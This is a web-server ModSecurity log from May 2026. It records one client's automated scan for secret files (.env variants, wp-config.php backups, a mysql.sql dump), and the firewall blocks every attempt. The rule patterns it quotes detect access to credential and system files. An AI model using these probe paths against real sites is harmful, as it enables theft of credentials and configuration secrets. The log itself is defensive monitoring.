[Tue May 26 13:04:06.072782 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8QAAUUs"]
[Tue May 26 13:04:06.076464 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8wAAUWA"]
[Tue May 26 13:04:06.097021 2026] [security2:error] [pid 470766:tid 470964] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C9gAAAEQ"]
[Tue May 26 13:04:06.124580 2026] [security2:error] [pid 470766:tid 470876] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/website/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DBQAAUW0"]
[Tue May 26 13:04:06.126665 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C-QAAAAY"]
[Tue May 26 13:04:06.186417 2026] [security2:error] [pid 470766:tid 470776] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-config.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DDgAAUQk"]
[Tue May 26 13:04:06.186646 2026] [security2:error] [pid 470766:tid 470798] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.bak"] [unique_id "ahVM7ujO_W1DqEcFHQ4DDwAAUR8"]
[Tue May 26 13:04:06.195593 2026] [security2:error] [pid 470766:tid 470783] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.new"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEAAAURA"]
[Tue May 26 13:04:06.195758 2026] [security2:error] [pid 470766:tid 470874] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.old"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEQAAUWs"]
[Tue May 26 13:04:06.217037 2026] [security2:error] [pid 470766:tid 470866] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEwAAUWM"]
[Tue May 26 13:04:06.285150 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C_QAAAEk"]
[Tue May 26 13:04:06.285407 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DAAAAUQ0"]
[Tue May 26 13:04:06.288652 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DAwAAAFk"]
[Tue May 26 13:04:06.299702 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DBwAAAD4"]
[Tue May 26 13:04:06.302517 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEgAAUXk"]
[Tue May 26 13:04:06.306474 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DGAAAACo"]
[Tue May 26 13:04:06.307126 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DCwAAACs"]
[Tue May 26 13:04:06.319919 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DFQAAURI"]
[Tue May 26 13:04:06.518090 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DKAAAAH8"]
[Tue May 26 13:04:06.603563 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "vcresco.com"] [uri "/*update.cgi*"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMwAAAHM"]
[Tue May 26 13:04:06.614525 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DLgAAAGA"]
[Tue May 26 13:04:06.618339 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMQAAAGw"]
[Tue May 26 13:04:06.628776 2026] [security2:error] [pid 470766:tid 470974] [client 195.178.110.199:43306] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMgAAAE4"]
[Tue May 26 13:04:06.650564 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:43314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DPAAAAEc"]
[Tue May 26 13:04:06.817788 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DSwAAAFQ"]
[Tue May 26 13:04:06.879307 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DTgAAABk"]
[Tue May 26 13:04:06.908525 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DVAAAAG8"]
[Tue May 26 13:04:06.911527 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DUwAAABw"]
[Tue May 26 13:04:06.929452 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:43306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DWAAAAEg"]
[Tue May 26 13:04:06.962438 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DWwAAAGg"]
[Tue May 26 13:04:06.968288 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DYgAAAEw"]
[Tue May 26 13:04:06.987592 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:43254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DXwAAACo"]
[Tue May 26 13:04:07.023586 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:43268] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DZAAAABY"]
[Tue May 26 13:04:07.077713 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:43378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM7-jO_W1DqEcFHQ4DawAAAFs"]
[Tue May 26 13:04:07.091691 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DagAAAGo"]
[Tue May 26 13:04:07.094730 2026] [security2:error] [pid 470766:tid 471008] [client 4.201.75.230:5293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-conffg.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DdQAAAHA"]
[Tue May 26 13:04:07.110891 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DbwAAAC0"]
[Tue May 26 13:04:07.116844 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.backup"] [unique_id "ahVM7-jO_W1DqEcFHQ4DdgAAAAE"]
[Tue May 26 13:04:07.117105 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DcwAAAA8"]
[Tue May 26 13:04:07.174816 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.bak"] [unique_id "ahVM7-jO_W1DqEcFHQ4DegAAAGc"]
[Tue May 26 13:04:07.213649 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DfQAAACY"]
[Tue May 26 13:04:07.216164 2026] [security2:error] [pid 470766:tid 470912] [client 5.183.252.121:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CaAAAABA"]
[Tue May 26 13:04:07.217073 2026] [security2:error] [pid 470766:tid 470901] [client 5.183.252.121:20411] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahVM7ejO_W1DqEcFHQ4CZQAAAAU"]
[Tue May 26 13:04:07.250543 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DgQAAAHg"]
[Tue May 26 13:04:07.258907 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DhAAAAH0"]
[Tue May 26 13:04:07.298300 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DigAAABI"]
[Tue May 26 13:04:07.303619 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DjQAAAFU"]
[Tue May 26 13:04:07.370023 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DkwAAAGs"]
[Tue May 26 13:04:07.411284 2026] [security2:error] [pid 470766:tid 470984] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DlgAAAFg"]
[Tue May 26 13:04:07.415293 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:43424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.old"] [unique_id "ahVM7-jO_W1DqEcFHQ4DmgAAABk"]
[Tue May 26 13:04:07.433845 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DmQAAAEA"]
[Tue May 26 13:04:07.550046 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DpAAAAHc"]
[Tue May 26 13:04:07.558242 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DpgAAAEg"]
[Tue May 26 13:04:07.613193 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DrAAAACM"]
[Tue May 26 13:04:07.654449 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DsQAAABY"]
[Tue May 26 13:04:07.676123 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DtQAAAAk"]
[Tue May 26 13:04:07.704718 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DuwAAAEs"]
[Tue May 26 13:04:07.751583 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DvgAAAE8"]
[Tue May 26 13:04:07.790875 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DwQAAAAo"]
[Tue May 26 13:04:07.810594 2026] [security2:error] [pid 470766:tid 470901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DxwAAAAU"]
[Tue May 26 13:04:07.908838 2026] [security2:error] [pid 470766:tid 471019] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1AAAAHs"]
[Tue May 26 13:04:07.925197 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1gAAAFA"]
[Tue May 26 13:04:07.930843 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1QAAAGQ"]
[Tue May 26 13:04:07.965418 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D2wAAAFU"]
